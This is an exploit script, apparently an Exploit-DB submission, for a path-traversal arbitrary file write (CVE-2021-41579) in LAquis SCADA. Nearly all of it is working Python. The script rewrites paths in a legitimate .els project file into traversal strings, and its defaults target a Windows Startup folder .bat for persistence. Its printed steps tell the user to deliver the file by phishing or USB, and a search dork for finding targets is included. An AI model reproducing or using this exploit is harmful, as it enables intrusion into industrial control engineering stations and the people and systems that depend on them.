# Exploit Title: LCDS LAquis SCADA <= 4.3.1.1085 - Arbitrary File Write via Malicious .els Project (Path Traversal + Control Bypass)
# Google Dork: inurl:".els" "LAquis" filetype:els
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Handle: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.lcds.com.br/laquis/
# Software Link: No longer publicly hosted (archived versions may exist; test on legitimate install <= 4.3.1.1085)
# Version: <= 4.3.1.1085 (REQUIRED)
# Tested on: Windows 10 x64 / Windows 11 x64 (LAquis SCADA engineering station)
# CVE : CVE-2021-41579

"""
LCDS LAquis SCADA Path Traversal + Control Bypass PoC (CVE-2021-41579)
"""

import sys
import re
import argparse
from pathlib import Path

DEFAULT_PAYLOAD_PATHS = [
    r"..\..\..\..\..\..\Windows\Temp\POC_CVE-2021-41579.txt",
    r"..\..\..\..\..\..\Users\Public\Desktop\evil.bat",
    r"..\..\..\..\..\..\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\calc.bat",
]

POC_CONTENT = b"Proof of Concept: CVE-2021-41579 exploited!\nWritten by Mohammed Idrees Banyamer (@banyamer_security)\n"

PATH_REGEX = re.compile(
    rb'([a-zA-Z]:[\\\/][^\x00"\r\n]{5,150}\.(png|jpg|bmp|gif|txt|ini|bat|vbs|exe|dll|xml|db|csv|log))',
    re.IGNORECASE
)

def modify_els(base_path: Path, out_path: Path, target_traversal: str, mode: str = "replace"):
    print(f"[*] Loading base .els: {base_path}")
    try:
        data = base_path.read_bytes()
    except Exception as e:
        print(f"[!] Error reading base file: {e}")
        return False

    matches = list(PATH_REGEX.finditer(data))
    if not matches:
        print("[!] No path-like strings detected. Try a different base .els or check format.")
        return False

    print(f"[*] Found {len(matches)} candidate path strings. Replacing first {min(3, len(matches))}...")

    payload_bytes = target_traversal.encode('utf-8', errors='replace')
    offset = 0
    modified = False
    new_data = data

    for i, match in enumerate(matches[:3]):
        start, end = match.span()
        start += offset
        end += offset

        orig_len = end - start
        new_data = new_data[:start] + payload_bytes + new_data[end:]
        offset += len(payload_bytes) - orig_len
        modified = True
        print(f"[+] Replaced path {i+1}: → {target_traversal}")

    if mode == "write" and modified:
        print("[*] 'write' mode: Embedding sample POC content (may not land exactly; for illustration).")

    if modified:
        print(f"[*] Saving malicious .els: {out_path}")
        out_path.write_bytes(new_data)
        print("\n[+] PoC generated!")
        print("   1. Deliver malicious.els to target (phish/USB/etc.)")
        print("   2. Victim opens in LAquis <= 4.3.1.1085 → clicks 'Play'")
        print(f"   3. If vulnerable → file written/accessed at: {target_traversal}")
        print("      Check target filesystem (e.g. C:\\Windows\\Temp\\POC_*.txt)")
        return True
    else:
        print("[!] No changes applied.")
        return False

def main():
    parser = argparse.ArgumentParser(description="CVE-2021-41579 PoC: Malicious .els modifier")
    parser.add_argument("base", type=Path, help="Legitimate base .els file")
    parser.add_argument("output", type=Path, help="Output malicious .els file")
    parser.add_argument("--payload", choices=["replace", "write"], default="replace",
                        help="Mode: 'replace' (default: path swap), 'write' (try embed POC content)")
    parser.add_argument("--target-path", default=None,
                        help="Custom traversal path (overrides defaults)")
    args = parser.parse_args()

    if not args.base.is_file():
        print(f"[!] Base file not found: {args.base}")
        sys.exit(1)

    print("=== CVE-2021-41579 LAquis SCADA Arbitrary File Write PoC ===")
    print(f"Author: Mohammed Idrees Banyamer (@banyamer_security)")
    print("https://github.com/mbanyamer\n")

    traversal = args.target_path
    if not traversal:
        print("[*] No custom path provided → using default PoC write path")
        traversal = DEFAULT_PAYLOAD_PATHS[0]

    success = modify_els(args.base, args.output, traversal, mode=args.payload)

    if not success:
        print("\n[!] Tip: Use a freshly created dummy project .els from vulnerable LAquis.")
        print("    Paths are often in image/script/resource sections.")

if __name__ == "__main__":
    main()